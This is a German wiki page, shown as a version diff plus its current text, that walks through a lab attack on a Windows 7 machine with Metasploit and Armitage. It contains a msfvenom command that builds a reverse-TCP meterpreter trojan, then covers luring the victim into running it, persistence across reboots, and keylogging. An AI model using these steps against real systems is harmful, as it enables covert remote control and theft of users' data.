Metasploit & armitage trojaner: Unterschied zwischen den Versionen

Aus xinux.net
Zur Navigation springen Zur Suche springen
Zeile 4: Zeile 4:
  
 
setup Opfer
 
setup Opfer
  Windows 7 domaine rechner
+
  Windows 7 Domain Rechner
 
  Benutzer: Admin
 
  Benutzer: Admin
 
  ip:  192.168.242.76
 
  ip:  192.168.242.76
Zeile 13: Zeile 13:
 
[[Datei:7 trojaner.png]]
 
[[Datei:7 trojaner.png]]
 
=dem opfer das programm unterschieben=
 
=dem opfer das programm unterschieben=
das opfer muss dazu gebracht werden das programm auszufüren wier bieten in diesem beispiel einfach die datei als download an
+
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an
  
 
[[Datei:8 opfer.png]]
 
[[Datei:8 opfer.png]]
  
auf der opfer seite
+
auf der opfer Seite
  
 
[[Datei:12 schadeware.png]]
 
[[Datei:12 schadeware.png]]
=kontrolle übernehmen=
+
=Kontrolle übernehmen=
  
nun starten wier erst meta sploit und danach arimtage
+
nun starten wir erst metasploit und danach armitage
  
 
[[Datei:1armitagestarten.png]]
 
[[Datei:1armitagestarten.png]]
  
wenn armitage gestarte ist erstellne wier einen server zum luaschen
+
wenn armitage gestartet ist erstellen wir einen Server zum lauschen
 
*payload
 
*payload
 
**windows
 
**windows
Zeile 35: Zeile 35:
 
und warten darauf das sich unser opfer verbindet
 
und warten darauf das sich unser opfer verbindet
  
nun erscheint oben rechts der opfer computer
+
nun erscheint oben rechts der opfer Computer
  
 
=Dauerhaft infizieren=
 
=Dauerhaft infizieren=
  
als nächstes wollen wier den trojaner dauerhaft speichern  
+
als nächstes wollen wir den Trojaner dauerhaft speichern  
  
wir suchen nach persists und geben einen neuen port an
+
wir suchen nach persist und geben einen neuen Port an
  
 
[[Datei:200persist.png]]
 
[[Datei:200persist.png]]
  
wen der computer nun neugestartet wird müssen wir nur auf dem neuen port lauschen und werden wieder verbunden
+
wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden
  
diese kann ein par minuten dauern
+
diese kann ein par Minuten dauern
  
 
=Was kann man machen=
 
=Was kann man machen=
jetzt gibt es viele möglichkeiten
+
jetzt gibt es viele Möglichkeiten
*rechtsklick infizierter pc
+
*Rechtsklick infizierter pc
 
**meterpreter
 
**meterpreter
 
***explore
 
***explore
hier können wir uns Prozesse oder dateien anzeigen lassen andere Prozesse infizieren oder einen keyloger installieren usw
+
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw
  
=kurz Beispiel key loger=
+
=kurz Beispiel keylogger=
  
[[metasploit & armitage keyloger]]
+
[[metasploit & armitage keylogger]]

Version vom 23. August 2016, 14:07 Uhr

setup Hacker

Kali linux
ip:  192.168.242.91

setup Opfer

Windows 7 Domain Rechner
Benutzer: Admin
ip:  192.168.242.76

Trojaner erstellen

msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx --format=exe > program.exe

7 trojaner.png

dem opfer das programm unterschieben

das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an

8 opfer.png

auf der opfer Seite

12 schadeware.png

Kontrolle übernehmen

nun starten wir erst metasploit und danach armitage

1armitagestarten.png

wenn armitage gestartet ist erstellen wir einen Server zum lauschen

  • payload
    • windows
      • metapreter

hier passen wir den LPORT an

und warten darauf das sich unser opfer verbindet

nun erscheint oben rechts der opfer Computer

Dauerhaft infizieren

als nächstes wollen wir den Trojaner dauerhaft speichern

wir suchen nach persist und geben einen neuen Port an

200persist.png

wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden

diese kann ein par Minuten dauern

Was kann man machen

jetzt gibt es viele Möglichkeiten

  • Rechtsklick infizierter pc
    • meterpreter
      • explore

hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw

kurz Beispiel keylogger

metasploit & armitage keylogger